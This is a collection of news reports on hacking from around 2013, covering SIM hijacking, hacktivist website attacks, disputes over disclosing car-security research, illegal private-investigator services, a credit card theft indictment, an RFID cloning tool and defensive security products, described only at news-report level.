Hacking episode embarrassed me: Radhika

BANGALORE: "Unfortunate and very embarrassing." This is how Sandalwood actor Radhika Pandit described the situation she faced after a 20-year-old college dropout allegedly hacked into her SIM card and sent messages to her contacts from her number. The youth was arrested on Sunday.
Radhika said, "It was invasion of one's personal life and not a nice feeling at all. I came to know that the arrested person had sent messages to producers and actors seeking photos and information about other artistes. Since many people trust me in Sandalwood, they were giving the information that he wanted. I agree, it is common for celebrities to face this kind of situation, but my reputation has been damaged by the incident."
Being a celebrity is not just about glamour, it has its pitfalls too and one has to deal with them, says Radhika. So will the actor keep her new number a secret? "No. Today's technology makes it easy to get the numbers of others. I can perhaps apply a little more caution.''
Radhika said she still wonders how her cell phone worked even after a complaint was given to the service provider for blocking her number. "I just want to know how it happened. I think the service providers should be cautious while dealing with complaints like mine. This type of incident can happen to anyone."

Siberian man faces jail, accused of hacking Kremlin website

A Krasnoyarsk man faces up to four years jail for allegedly blocking President Vladimir Putin's website for one hour.

Internet users in Russia said they were unable to access the Kremlin website for up to an house before counter measures were taken. Picture: Kremlin website

A file on the 30 year old has been passed to a court in the city, a regional FSB secret services source told Rossiyskaya Gazeta. He was acting in support of the so called 'March of the Millions' by opposition activists last May, it was reported.
The man - who was not named - denies intentionally downing the Kremlin.ru website, said the newspaper.
'He is not pleading guilty, saying to the investigation that he was not aware that this programme was a malware and might block the website. But the investigation found that the defendant consciously used the hacking programme,' said the FSB source.
At the time reports said that the attack on the president's site on May 9, two days after Putin was inaugurated for the third time, was by hacker activist group Anonymous.
On an opposition Twitter account a message was posted declaring: 'Anonymous shuts down Kremlin's websites'.
Internet users in Russia said they were unable to access the Kremlin website for up to an house before counter measures were taken.
The attack was predicted in advance. It was not previously known that the hacking attack originated in Siberia.The criminal case was opened under part one of clause 273 of Russia's Criminal Code - 'Manufacturing, using and distributing of computer's malware'.
'All the relevant departments are taking the necessary measures to counteract attacks', said a spokesman for the Kremlin Internet security division at the time. 'This is routine work. There is always some external influence. Today we are witnessing a splash of activity (by the attackers).'
However they had 'failed to achieve their goal' of downing the site for any length of time, he said.

Volkswagen halts disclosure of hacking secrets

LONDON — A British university is delaying the release of an academic paper on how the antitheft systems of millions of Volkswagen vehicles are at risk of being hacked after the German carmaker took legal action against it.
In a statement, the University of Birmingham said it would defer publication of the paper — which explains how researchers were able to subvert Volkswagen's security system — after an interim injunction issued by England's High Court. It said it was "disappointed with the judgment which did not uphold the defense of academic freedom and public interest, but respects the decision."
The university did not elaborate on how long the paper would be held, saying it was still getting legal advice.
The paper — which a group of academics had planned to publish next month — revealed three ways to bypass a brand of computer chip used by several auto manufacturers to fight vehicle theft.
Often referred to as immobilizers, such chips use a secret algorithm to ensure that a car can only be started with the right key, and they've been mandatory in all new vehicles sold in Britain over the past 15 years.
Crucially, the researchers planned to reveal how they were able to reverse-engineer the algorithm — and publish a copy of it in their paper.
Volkswagen said that publishing the formula would be highly damaging and facilitate the theft of cars, according to a ruling handed down last month by High Court Justice Colin Birss. The judge said that millions of Volkswagen vehicles were issued with the chip, including high-end cars such as Porsches, Audis, Bentleys, and Lamborghinis.
The researchers countered that Volkswagen's claim that the paper would be a boon to car thieves was overblown, they had warned the chip's manufacturer about the vulnerability six months ago and a gag order would interfere with their legitimate academic work.
Birss said he sympathized with the researchers' rights, but had to weigh them against public safety.
"I recognize the high value of academic free speech, but there is another high value, the security of millions of Volkswagen cars," he said.
It's not yet clear if the case will go to trial. The University of Birmingham declined further comment today. Volkswagen also declined comment, citing ongoing proceedings.

Hacking: Keith Vaz says firms linked to rogue investigators may not be named

Keith Vaz, who has been leading an inquiry into private investigators suspected of hacking and other illegal practices. Photograph: Linda Nylind for the Guardian

The names of law firms, insurance companies and others linked to rogue private investigators suspected of hacking and other alleged illegal practices may not be released because they could compromise a police investigation, the chairman of the Commons home affairs select committee has said.
Keith Vaz, who has been spearheading an inquiry into private investigators' practices, told Radio 4's Today programme he wanted to reveal the names of the organisations on the list and could do so using parliamentary privilege, but had been told by the information commissioner and the Metropolitan police that they could be interested in investigating the 94 businesses and individuals on the list compiled by the Serious Organised Crime Agency (Soca).
The identities of the firms involved have not yet been revealed, although Vaz's committee has released a breakdown of the sectors they work in, including law, oil, rail services and the security industry.
Twenty-two law firms used private investigators convicted of illegally obtaining information, MPs have said.
Others on the list include celebrities, eight financial services firms and 10 insurance companies.
Vaz told BBC Radio 4's Today programme: "I don't think that parliament should be part of a 'secret squirrel' club where we are given a list that is important and should be in the public interest and we are not able to publish it.
"The reason that we can't publish it at the moment – though I am consulting with members of the committee and we will come to a view on this – is because we are told that both the information commissioner and the Metropolitan police may be interested in investigating the 94 companies, firms, individuals that are on the second list."
A final decision on whether to release the names would be taken when the committee published its report, he said.
"The deadline, if you like, is when we publish our report into private investigators, we would like to be in a position where we publish the entire list. But we don't want to compromise any investigation that the Metropolitan police may or may not be involved in."
Vaz said Soca and the police would appear before the committee on 3 September to update members on progress. "We want to be responsible," he added.
Controversy over Soca's refusal to name the rogue operators' clients has grown in the past few weeks as it emerged that blue-chip companies may have inadvertently used investigators who used illegal techniques.
There have been calls for the firms to be named and investigated in the same way as the News of the World executives and journalists were following the phone-hacking scandal.
The list suggested that private investigators often subcontracted work to each other – 16 clients were other private investigation agencies.
It was put to Vaz that the police could keep the committee "stringing along forever", and he said: "That is the balance. This list has been around for a number of years and nobody has done anything about it."
He added: "Frankly, what it just needs is somebody to go along to the 94. This can be cleared up quite quickly. You should ask the firms involved did they know that the rogue investigators were getting illegal information, were they acting illegally? If yes, then you have to consider criminal liability. If no, then you cross them off. These companies, individuals and firms don't even know they are on this list."
Vaz added: "The real root of all this, of course, is we need to regulate about private investigators. We recommended this a year ago, it's not happened and hopefully the government will finally join the debate by doing something about it."

£7,000 to hack a phone or bug a computer: Private investigators have detailed price list of illegal services

Bank details for £2,000 and phone bills for £450 also on 'menu' of services

PIs could also use viruses to steal data, including what tax people pay

Their illicit services were used by law firms, insurers and wealthy individuals

Criminal private investigators charged firms up to £7,000 to hack a phone, according to a secret document leaked yesterday.They offered to hack, blag and steal sensitive personal information in a detailed price list of illegal services, a police intelligence report found.Among those fuelling the underworld trade were information hungry law firms, insurers, financiers and wealthy individuals.The Serious Organised Crime Agency (Soca) found intercepting telephone conversations came with a bill of up to £7,000.

Yours for £7,000: Private eyes could eavesdrop conversations for a cash sum, according to Soca. File picture

And private eyes charged the same amount to use computer viruses to steal data from the hard-drives of targets.

Personal bank details could be obtained for £2,000 and one month of itemised phone billing cost £450.

More...

• Firms hired by Whitehall used rogue private eyes: Revelation means 'secret hacking scandal' has reached doors of Government
• Corrupt private investigators targeted HM Revenue and Customs, BT and British Gas to access sensitive private data

Other services, including getting customer details from utility companies and finding out how much tax people pay, could be purchased for as little as £100.

The price list was compiled in a 2008 report by Soca officials who were deeply concerned at the increasing threat of dodgy private eyes.Yesterday, an uncensored version released on the internet for the first time outlined how private investigators targeted almost every source of official information.

An itemised phone bill for a month would set clients back £450. File picture

Among the public institutions to come under attack were HM Revenue and Customs, the Department of Work and Pensions, the NHS and local authorities.

Other private companies included high street banks, British Gas, British Telecom and mobile phone companies.Rogue private investigators outsourced work to specialist ‘blaggers’ who posed as customers and colleagues to access private information.Using untraceable mobile phones, they often referred to scripts and hints recorded in a document that became known as ‘The Blagger’s Manual’.The incriminating ‘how to’ book of crime was found by police when they raided the offices of one private investigator operating in the London suburbs.

The Soca report, which was previously released in a censored form, was based on the results of five criminal investigations.Among them was Operation Carytid, Scotland Yard original investigation into phone hacking at the News of the World.They found five groups of people were using private investigators to obtain information that they could not get their hands on legitimately.They were those involved in messy divorces, debt collectors trying to find people, insurers investigating claims, criminals who want to frustrate the police and the media.

One of the most prolific private eyes has since come forward to claim that 80% of his clients were not linked to the media.The leak came as pressure continues to pile on Soca and police to name those who may have used criminal private eyes.

MPs, including Keith Vaz, want to find ways of publishing the list

More than 300 companies and individuals may have been identified by police investigating so-called ‘blue chip’ hacking.A list of 102 names has been passed to the Home Affairs Select Committee by Soca on the agreement that they will not be published.So far no-one has been named publicly or prosecuted despite clear evidence that the activities of their snoopers broke the law.Keith Vaz MP, who chairs the Home Affairs Committee, has written to a string of regulators to ask for what guidelines are enforced on the use of private eyes.MPs are concerned that some companies may have turned a blind eye to how they obtained the information because they were desperate for results.Home Secretary Theresa May is expected to announce proposals that will require private detectives to have a licence to operate.

Anyone found guilty of hacking, blagging or other similar offences will be barred from working in the field.

A spokesman for HM Revenue and Customs said it takes expert technical advice to help protect the mass of information it stores.

He said: ‘We take the protection of customer data extremely seriously so we constantly review our processes and procedures in light of developments.’A BT spokesman said staff take their responsibility to protect customers ‘very seriously’ and ‘will not tolerate’ misuse of its databases.A Home Office spokeswoman said: ‘We expect law enforcement agencies to take tough action against criminal behaviour wherever it is identified.’

What's Your Favorite Life Hack for Technology?

Because smart people who are good at solving problems with DIY methods or life hacks also happen to be very good at the Internet and because people who are good at the Internet also happen to be very good at finding DIY methods or life hacks to solve problems, it seems like we've come to a point where we already know how to solve all of technology's minor annoyances with simple DIY hacks.

Like come on, who hasn't figured out ways (or at least saved ways to a folder on their desktop called Hacks) to fix messy cables and power cords with binder clips, bread tabs and/or ribbons or something. And seriously, we all know by now that binder clips are the most versatile tool in a life hacker's arsenal, right? Cardboard toilet paper rolls are a solid second place though.

Did you hear about the one where you tie extension cords together to prevent them from unplugging? Or the accidental genius that created rubber bands on a power adapter? And what about pen springs to extend the life of your cables! There's just so many little fixes out there that blew our minds once upon a time but are just recycled over and over now. And that's fine! We didn't all know the world was round at one point. Or something like that. Whatever.

What's your favorite life hack for technology? Is it one of the nine BuzzFeed cited in the video above or is it something even better? Or maybe it's one of the 40 tricks we featured last year? Or maybe you just like seeing life hacks more than actually using life hacks.

Dotcom says Anonymous protest hack of NZ govt websites will backfire

Hackers disabled several websites of New Zealand's ruling party to protest a new law that would enable the country’s spy agency to snoop on its citizens. Kim Dotcom said hacking the sites only gave PM John Key “a new excuse to pass the GCSB bill”.
Dotcom, the MegaUpload founder who the victim of Government Communications Security Bureau (GCSB) snooping last year, is among those outraged by the New Zealand bill. However, the internet mogul said on Twitter that hacking National Party websites would only make things worse. 

The bill was actually prompted by disclosures that the Bureau had illegally spied on Dotcom, who is fighting attempts by the US government to extradite him on charges of Internet piracy, copyright infringement, and money laundering.

On July 28 hacktivist group Anonymous uploaded a video on YouTube claiming responsibility for the hacking of fourteen websites, including those for Prime Minister John Key and Finance Minister Bill English. The attack was prompted by Key’s refusal to listen to protests against the ''despicable piece of legislation''.

“This new law allows to spy on New Zealanders without a warrant. We strongly condemn this bill,” the video message explained. “John Key, do you think you can pass a new law without a majority of New Zealanders behind it?”

A screenshot from gerrybrownlee.com

The websites of the Prime Minister and Finance Minister were restored after being attacked around midnight. The website of the Deputy Leader of the National Party Gerry Brownlee is still disabled.  

The surveillance bill, which is expected to be passed in parliament, would give the GCSB carte blanche to listen in on citizens’ phone conversations. As things stand now, it spies on foreign targets via electronic listening posts but is not allowed to spy on New Zealand citizens or residents.

The law has been slammed by Internet and civil rights groups, prompting street protests over the weekend. Thousands of people turned out in eleven cities and towns across New Zealand in what was dubbed as an “uphill battle” to stop the bill from coming into effect.

''It has come to our attention that the thousands that have marched against this bill has still not been enough to send John Key and Peter Dunne a message," Anonymous said in the video message.

"John Key make no mistake the majority of New Zealanders oppose this bill. Due to your own arrogance and your unwillingness to listen to the people we have decided to take direct action.''

Anonymous promised that the websites would remain offline until the National Party patched its web servers or withdrew the bill and apologized to those it had affected, including Kim Dotcom.

Last January New Zealand police stormed Dotcom’s mansion, seizing assets and digital material. A judge later condemned the raid as illegal and ordered law enforcement to return items that were seized that were not directly linked the case against Dotcom. The judge’s decision also led to an official apology from Key to Dotcom, who alleged that the GCSB collaborated with the US government in a bid to comply with the extradition order issued by Washington.

Been hacked? Don't dial 999: The plods are too dense, sniffs sec bigwig 'The problem is too big for the authorities to handle'

Police are powerless to stop super-smart criminals from hacking the world's biggest companies, a top-ranking security bod has warned.
Juniper Networks' security chief said there was simply no longer any point in calling the police when hackers and DDoSers came to call, because the cops can't do anything. He wants to see a world where big firms share information about potential targets and stop them before any damage can be done.
Henrik Davidson, the firm's director of security, said: "The problem is too big for the authorities to handle, playing into the hands of the cyber criminals. Additionally there are complications with the global complexity that hacking presents. Who is responsible if a hacker based in Asia attacks a European company? We’ve simply reached a stage where the IT security industry needs to be able to protect itself."
Davidson made the comments while telling El Reg about Juniper's new "next generation data centre security" system, which now incorporates anti-DDoS defence systems. We visited Juniper's Dutch testing lab, where they show off their latest data centre and networking technology.
Amsterdam is, of course, famous for two things - and neither were on offer at Juniper Networks' Dutch outpost. Instead the big data shifting bods wanted to show off their sexy racks, although not in the way that most visitors to the city would understand.
Money is not discussed in the Juniper Proof of Concept lab, where customers - and the nerdier type of journalist - come to coo over various bits of data centre gubbins. Which is just as well, because with prices stretching into the tens of thousands of euros, this is not a place for the casual shopper.
Juniper told us their new data centre security system offers a four-pronged manner of repelling hackers and DDoS assaults.
The system allows companies to collect the "fingerprints" of individual hackers, by building up a picture of the attacker based on 200 characteristics, including browser settings, time zone and even fonts. This allows for the blocking of individual devices, a more sophisticated form of defence than simple IP blocking.
The newest part of this system is called DDoS Secure, which Juniper claims is capable not only of repelling traditional large-scale DDoS attacks, but also the newer “low and slow” attacks, which use slow, small-scale traffic to bypass security and bring down servers.
DDoS Secure monitors incoming and outgoing traffic, learning which IP addresses and devices can be trusted. It can detect unusual activity from a user and then respond by blocking them.
Whenever a threat at one port or other vulnerable point is identified, its details are immediately sent to other access points in order to make sure the attacker is repelled.
Juniper claimed its "Active Defence" system not only worked by fending off attacks, but by identifying threats and stopping them.
Davidson added: "Active Defence allows you to identify the bad guys before they attack. If you know who the bad guys are, and where they are coming from, you can make life difficult for your attackers if they try and break your defences.
"Attackers can be identified by a deception point, of which there are thousands. This allows you to identify the characteristics of their device, what fonts they use, what patches they have installed and their IP address, among others. With that you can push a digital fingerprint to the cloud and share the details with partners and other vendors to ensure that more organisations do not face the same threat."
According to a Juniper survey of 4,771 IT execs worldwide, 60 per cent said their systems had been attacked in the past 12 months. But the same percentage of execs were unhappy with their current defence systems, including next-generation firewalls and IP blocking.
"For 40 anti-virus systems, there is only a 5% catch rate," Davidson continued. "According to William Fallon’s book The Cyber-readiness Reality Check the number of organisations under attack is close to 100%. More than a third of cyber security execs at companies with revenues greater than $100 million are unable to see an attack once it finds its way into the perimeter of their system. It’s like leaving your front door wide open when there is a burglar in the neighbourhood.
"Traditional security methods just aren’t passing the test and companies don’t stand a chance as cyber-crime becomes increasingly sophisticated and more frequent."
Juniper's bosses stepped down on Wednesday in happy circumstances, with the firm's profits and sales both up

FACTBOX - Hacking talks that got axed

REUTERS - Hacking experts and product manufacturers have sometimes been at odds over whether the disclosure of security vulnerabilities is helpful, or harmful, to the public interest.
Lawsuits, or even the threat of legal action, have resulted in the cancellation of some hacking presentations in recent years. Here are some examples, ahead of this week's Black Hat and Def Con hacking conferences in Las Vegas:
2005 - Cisco Systems Inc (CSCO.O) persuaded security firm Internet Security Systems to pull a discussion on hacking routers by researcher Michael Lynn at the Black Hat annual hacking conference in Las Vegas.
On the eve of the conference, Black Hat organizers had workers tear out Lynn's presentation materials from a printed handbook given out to thousands of attendees. Lynn gave the talk anyway, was fired by ISS, and an injunction was obtained to block further public discussion.
2007 - Security firm IOActive Inc pulled a talk that researcher Chris Paget was due to present at Black Hat DC on bugs in radio-frequency identification, or RFID, technology, saying it was pressured to do so by RFID technology firm HID Global Corp.
2008 - Three MIT undergrads canceled a Def Con talk in Las Vegas on hacking the "Charlie Card" payment cards for Boston's subway system after an injunction by a U.S. federal court. A judge later rescinded the order, allowing them to go public.
2013 - Three European computer scientists canceled a talk on hacking the locks of luxury cars at a prestigious U.S. academic conference to be held in August, after Volkswagen AG (VOWG_p.DE) obtained a restraining order from a British court.
Their paper, which was titled "Dismantling Megamos Crypto: Wirelessly Lockpicking a Vehicle Immobilizer," identified ways to hack into the lock systems of luxury cars including Porsches, Audis, Bentleys and Lamborghinis.

DARPA-Funded Hackers Gain Control Of Toyota Prius, Ford Escape

redOrbit Staff & Wire Reports – Your Universe Online

Two computer hackers who have successfully managed to hack into and manipulate a pair of widely-owned automobiles will present their findings at the Def Con hacking conference in Las Vegas this week, various media outlets are reporting.
According to FoxNews.com, veteran hackers Charlie Miller and Chris Valasek have discovered a way to remotely force a 2010 Toyota Prius to stop suddenly at high speeds or accelerate without the driver’s foot even being on the gas pedal. Likewise, they claim to be able to disable the breaks of a 2010 Ford Escape at “very low speeds.”
The two “white hats” (the name given for hackers to try to detect software vulnerabilities before criminals can exploit them) received funding from the US Defense Advanced Research Projects Agency (DARPA) for their research, according to the International Business Times.
Miller, a security engineer at Twitter, and Valasek, director of security intelligence for Seattle-based IOActive, were tasked by government officials to find out how vulnerable cars could be to computer hacks. They will publish blueprints of the techniques they discovered for attacking the two vehicles in a 100-page white paper, as well as all associated software used in their project, during this week’s conference.
Their findings might sound downright frightening, but Reuters reporter Jim Finkle said that Prius and Escape owners shouldn’t be too concerned just yet. After all, in order to manipulate the cars, the duo had to be seated within the vehicle and use laptops connected directly to each car’s computer network.
“They will not be providing information on how to hack remotely into a car network, which is what would typically be needed to launch a real-world attack,” Finkle said. Miller and Valasek said that they are releasing the data hoping that their “white hat” colleagues will be able to build upon their efforts and discover additional automotive security flaws that could be corrected.
“At the moment there are people who are in the know, there are naysayers who don’t believe it’s important, and there are others saying it’s common knowledge but right now there’s not much data out there,” Miller told BBC News Technology Reporter Zoe Kleinman. “We would love for everyone to start having a discussion about this, and for manufacturers to listen and improve the security of cars.”
So how did they do it? According to Kleinman, they used cables to connect their laptops to the electronic control units (ECUs) of the vehicles using the on-board diagnostics post, which is also used by mechanics to discover problems with the vehicles.
The ECUs are the part of the computer network responsible for acceleration, braking, steering and several other aspects of the car’s regular operations process. Once Miller and Valasek gained access to it, they were able to write programs that sent instructions to the car network and overrode the drivers’ commands, she added.
Toyota spokesman John Hanson told reporters that the company was reviewing the duo’s research, calling the hacks “entirely possible” and stating that the manufacturer is “absolutely” taking the findings seriously.
Conversely, Craig Daitch of Ford said that since the attack was not “performed remotely” but required “highly aggressive direct physical manipulation of one vehicle over an elongated period of time,” it most likely did not pose “a risk to customers and any mass level.”

IBM unveils software to identify and predict security risk

IBM announced an integrated security intelligence solution that helps organizations identify key vulnerabilities in real-time.

QRadar Vulnerability Manager gives security officers a prioritized view across their network, allowing them to fortify their defenses. By aggregating vulnerability information into a single view, security teams can see the results from multiple network, endpoint, database or application scanners where it can be reviewed and managed.


More than 70,000 security vulnerabilities exist today, with more than a dozen more being reported every day. The rapid expansion of social, mobile and cloud computing can further increase the threat landscape as each new device attached to a network further expands potential vulnerabilities.

Part of the IBM Security Intelligence Platform, QRadar Vulnerability Manager (QVM) is a software module that combs through security holes to help close them to potential exploits, excluding those hidden behind firewalls, associated with inactive applications or otherwise unreachable from external attacks.

By activating a license key, this new software can automatically scan the network and perform the analysis helping security teams direct their staff resources.

“Traditional vulnerability management solutions are fundamentally broken,” said Brendan Hannigan, General Manager, IBM Security Systems. “Vulnerability scanning today lacks network-wide visibility, contextual awareness and real-time scanning. These gaps mean even well-known and preventable vulnerabilities can be lost in an overload of data, leaving organizations exposed to high risks.”

QRadar Vulnerability Manager helps clients reduce the remediation and mitigation burden by aggregating vulnerability information into a single risk-based view where it can be quickly prioritized. Security teams can see the results from multiple network, endpoint, database or application scanners alongside the latest X-Force Threat Intelligence alerts and incident reports from the National Vulnerability Database. QRadar Vulnerability Manager also includes its own embedded, PCI-certified scanner which can be scheduled to run periodically or triggered based on network events.

"QRadar Vulnerability Manager is a breakthrough for the IT security industry,” said Murray Benadie Managing Director, Zenith Systems, an IBM Business Partner. “It can cut a huge list of vulnerabilities in half, if not more. Users will quickly see vulnerabilities on their networks, without trying to mash products together– that is how information falls through the cracks. This is a true game changer.”

IBM is enhancing its intrusion prevention platform with the introduction of the IBM Security Network Protection XGS 5100. Fully integrated with IBM Security QRadar, the platform now provides ongoing network data feeds to help identify stealthy Secure Socket Layer attacks (SSL--a security protocol to enable Web sites to pass sensitive information securely in an encrypted format), in addition to providing real-time protection from advanced threats and heightened levels of network visibility and control. This enhanced intrusion prevention platform also includes IBM’s unique virtual patch technology to provide vulnerability protection when a software patch is not yet available.

NTODefend now more effectively blocks application vulnerabilities

NT OBJECTives announced that its NTODefend solution now blocks application vulnerabilities by approximately 30% more than the previous version. As a result, NTODefend’s virtual patching solutions now automatically block an average of 95% of an application’s vulnerabilities when leveraged with intrusion detection and prevention technology based on Snort, like Sourcefire’s Next Gen IPS or ModSecurity’s WAF.

“Few enterprise security teams actually have time to properly train their WAFs to provide the necessary protection, leaving applications and enterprises vulnerable to an ever-changing landscape of threats,” said Dan Kuykendall, co-CEO and CTO of NT OBJECTives. “By strengthening our solution with more accurate rules, we are able to save security teams time, improve the effectiveness of their WAF or IPS, and better protect their web applications from attacks.”

Most types of web application security software offer virtual patching solutions that merely turn on the default rules packaged with the WAF or IPS; however, in many cases, custom rules are necessary and critical in order to more effectively block discovered vulnerabilities without blocking desirable traffic.

NTODefend automatically leverages knowledge of the application with information about the vulnerability that instantly creates a custom rule to block the vulnerability. The impact of this custom rule is significant. According to a 2011 study by Larry Suto, web application firewalls become up to 39% more effective in blocking web application vulnerabilities when layered with Dynamic Application Security Testing (DAST) solutions.

NTODefend enables enterprise security teams to create custom rules to patch their WAF or IPS against vulnerabilities discovered in automated NTOSpider scans. With NTODefend, security professionals are able to patch web application vulnerabilities immediately, expediting the days or weeks it can take to build a custom rule for a WAF or IPS, or the time it takes to deliver a source code patch. This provides developers with the time they need to identify the root cause of the problem and fix it in the code.

Users simply take the results of their NTOSpider web application security software scan, import them into NTODefend, and generate strong customized rules that target the application’s vulnerabilities, which increases the WAF’s accuracy and ability to protect WAF/IPS. These filters are able to pinpoint vulnerabilities without blocking desirable traffic.

The improved rules enhancement enables an almost 47% increase in the application vulnerabilities blocked using NTODefend and Sourcefire or ModSecurity.

Hacker Ring Stole 160 Million Credit Cards

U.S. federal authorities have indicted five men — four Russians and a Ukrainian – for allegedly perpetrating many of the biggest cybercrimes of the past decade, including the theft of more than 160 million credit card numbers from major U.S. retailers, banks and card processors.
The gang is thought to be responsible for the 2007 breach at credit card processor Heartland Payment Systems that exposed some 130 million card numbers, as well as the 2011 breach at Global Payments that involved nearly a million accounts and cost the company almost $100 million.
Federal prosecutors in New York today called the case the largest hacking scheme ever prosecuted in the U.S. Justice Department officials said the men were part of a gang run by Albert “Soupnazi” Gonzalez, a hacker arrested in 2008 who is currently serving a 20-year-prison sentence for his role in many of the breaches, including the theft of some 90 million credit cards from retailer TJX.
One of the accused, 27-year-0ld Dmitriy Smilianets, is in U.S. custody. Vladimir Drinkman, 32 of Syktyvkar, Russia, is awaiting extradition to the United States. Three others named in the indictments remain at large, including Aleksandr Kalinin, 26 of St. Petersburg; 32-year-old Roman Kotov from Moscow; and Mikhail Rytikov, 26, of Odessa, Ukraine.
According to the government’s indictment, other high-profile heists tied to this gang include compromises at:
Hannaford Brothers Co: 2007, 4.2 million card numbers
Carrefour S.A.: 2007, 2 million card numbers
Commidea Ltd.: 2008, 30 million card numbers
Euronet: 2010, 2 million card numbers
Visa, Inc.: 2011, 800,000 card numbers
Discover Financial Services: 500,000 Diners card numbers
In addition, the group is being blamed for breaking into and planting malware on the networks of NASDAQ, 7-Eleven, JetBlue, JCPenny, Wet Seal, Dexia, Dow Jones, and Ingenicard.
The hackers broke into their targets using SQL injection attacks, which take advantage of weak server configurations to inject malicious code into the database behind the public-facing Web server. Once inside, the attackers can upload software and siphon data.
The government’s indictment alleges that the thieves were at times overwhelmed by the sheer amount of data yielded by their SQL attacks.  On Aug. 12, 2007, Kalinin allegedly sent Gonzalez  an instant message that he’d just gained access to 30 SQL servers on NASDAQ’s network, but hadn’t yet cracked the administrator passwords that secured the data inside. “These [databases] are hell big and I think most of info is trading histories.” On Jan. 9, 2008, after Gonzalez offered to help attack the trading floor’s computer systems, Kalinin allegedly messaged back, “NASDAQ is owned.”

Court documents feature an alleged conversation between Kalinin and Gonzalez from March 18, 2008, months after the Hannaford Bros. attack:

Kalinin: haha they had hannaford issue on tv news?
Gonzalez: not here
Gonzalez: I have triggers set on google news for things like “data breach” “credit card fraud” “debit card fraud” “atm fraud” “hackers”
Gonzalez: I get emailed news articles immediately when they come out, you should do the same, it’s how I find out when my hacks are found

Just a few weeks later, news of a massive credit card breach at Hannaford started trickling out:

Gonzalez: hannaford lasted 3 months of sales before it was on news, im trying to figure out how much time its going to be alive for
Gonzalez: hannaford will spend millions to upgrade their security!! lol
Kalinin: haha
Kalinin: they would better pay us to not hack them again

According to prosecutors, the other members of the gang helped harvest data from the compromised systems, and managed the bulletproof hosting services from which the group launched its SQL attacks [the government alleges that Rytikov, for example, was none other than "Abdullah," a well-known BP hosting provider]. The men allegedly sold the credit card data to third parties who routinely purchased them at prices between $10 and $50 apiece. The buyers were given PIN codes and magnetic stripe data that allowed them to create cloned cards for use at retailers and ATMs around the world.

Long-Range RFID Hacking Tool to be Released at Black Hat

Out of necessity come many interesting inventions.
Fran Brown, a year ago, was working a penetration test for an electric utility doing an assessment of its SCADA network. His first challenge was to get inside the facility, meaning, in short that he had to break in. To do so, he decided to test the utility’s physical security systems, specifically, the low-frequency RFID proximity cards used for building access.
While past research on the problem existed, including Kristin Paget’s groundbreaking 2007 talk at Black Hat DC on RFID cloning, most of the work on the topic included tools that were never released or papers that were largely theoretical. His scouring for information included everything from past talks on the subject, to reading product manuals and even translating some information he found online from a Czech professor.
Next week at the Black Hat Briefings in Las Vegas, Brown will release the end result: a modified RFID reader that can capture data from 125KHz low frequency RFID badges from up to three feet away. Previous RFID hacking tools must be within centimeters of a victim to work properly; Brown’s tool would allow an attacker or pen-tester to store the device inside a backpack and it would silently grab card data from anyone walking close enough to it.
“This is the difference between a practical and impractical attack,” said Brown, managing partner at consultancy Bishop Fox. Brown said his attack has been tested numerous times with a 100 percent success rate; he added he’s been able to train other consultants to use the tool and have them capable of doing so within 10 minutes.
“Hopefully we can start getting ahead of these attacks as they become more applicable,” Brown said, highlighting the example of Disney moving to RFID readers for everything from ticketing, fast passes inside its parks, and souvenir purchases with a Disney-specific credit card. “Every office we tested, whether it was a Fortune 100 customer or government agency, I’ve not come across a system not using one of these legacy readers.”
The RFID systems have no security, such as encryption, behind them, making it trivial to intercept badge information. An attacker can in theory capture card data, clone it onto a new card, and be able to access a physical facility. Compounding the problem for enterprises is that these readers and badges are often managed by physical security teams and generally operate on a 20-year product lifecycle. For a large company with 100,000 employees, you’re looking at at least that many replacement badges and readers, often in many countries. HID, a leading proximity-card manufacturer, admitted in a June blogpost that its legacy 125KHz cards are vulnerable, yet are still in place in 80 percent of physical access control systems despite the availability of more secure alternatives.
“There is no security, they’ve been hacked, there’s no protection of data, no privacy, everything is in the clear and it’s not resistant to sniffing or common attacks,” said Stephanie Ardiley, product manager, HID Global.
Brown’s attack involves the customization of a RFID reader by using an Arduino microcontroller to turn it into a long-range reader capable of reading card data from up to 36 inches away making stealthy approaches possible.
“This involved the creation of a small, portable [printed circuit board] that can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use such as badge cloning,” Brown said.
Brown said penetration testers will be able to purchase an Arduino microcontroller, install the code he will make available after Black Hat, and replicate his tool and attack.
“[Hackers] who are seriously motivated can build custom stuff on their own. This is targeted toward the Fortune 500 security professional,” Brown said. “As with any penetration testing tool, this one can be turned malicious. But the way I think of RFID Hacking is that it’s where Web application security was 10 years ago. Until people are doing SQL injection and here’s me stealing with SQL injection, no one is going to be motivated to do anything about it.”
Brown said he will share some mitigation advice during his talk, including recommendations on which protective sleeves work better at thwarting these types of attacks, and which security screws should be used to secure RFID readers. He will also talk about software-based anomaly detection systems that should be configured to detect people using access cards at odd hours or unusual locations.

Hawaii cyber range launches anti-hacking training

HONOLULU — The state of Hawaii on Wednesday launched a center to train people to defend computer systems from attack. 
 

The so-called "cyber range" is a collection of servers and routers in a room on the University of Hawaii's Manoa campus. The equipment will allow people to practice hacking computer systems as a way to learn about network vulnerabilities.
The machinery will get a workout in early August when the university hosts a training exercise for up to 100 people. Participants will split into a red team of hackers and a blue team responsible for defending a hypothetical business's computer systems.
"You can really do a good job of fortifying your system but you don't really know how fragile a system is until you try and break it. That's what a cyber range is about," said Brian Chee, the director of the university's Advanced Network Computing Laboratory.
Most ranges in the country have been built for the military and they are still rare in the civilian world, he said.
"This is taking the cyberwarfare game and stepping it up a lot," said Chee, whose lab tests equipment for Info World, a network equipment trade magazine.
Pretending to be a "black hat" or malicious hacker is good practice, he said.
Chee recounted how he once scanned open wireless network connections while sitting in a downtown Honolulu park between the state's major banks. He found one, and was able to use it to see financial transactions being carried out. He called his friend in the bank's information technology department, who discovered a bank employee had installed an unauthorized Wi-Fi access spot under his desk.
"They created this big giant puka behind the firewall," he said using the Hawaiian word for hole. "I was actually seeing financial transactions go by. If a black hat decided to take advantage of that, they could wreak havoc."
The equipment for the cyber range would cost just under $2 million if bought new, Chee estimated. But the state spent only about $1,000 on it because most of it was donated from places like Chee's lab and the Maui High Performance Computing Center, said Franklin Jackson, cyber security executive for the state Department of Defense.
University officials, private sector workers and the Hawaii National Guard worked together to get the center going.
Gov. Neil Abercrombie said at a dedication ceremony for the range his administration will follow up during the next legislative session with proposals to invest more in information technology.
Underscoring the importance of the cyber range to the state, Abercrombie was joined by the state adjutant general, Maj. Gen. Darryl Wong, Honolulu Police Department Chief Louis Kealoha and the top federal prosecutor for Hawaii, Florence Nakakuni, at the ceremony.

Read more here: http://www.kansascity.com/2013/07/24/4365315/hawaii-cyber-range-launches-anti.html#storylink=cpy

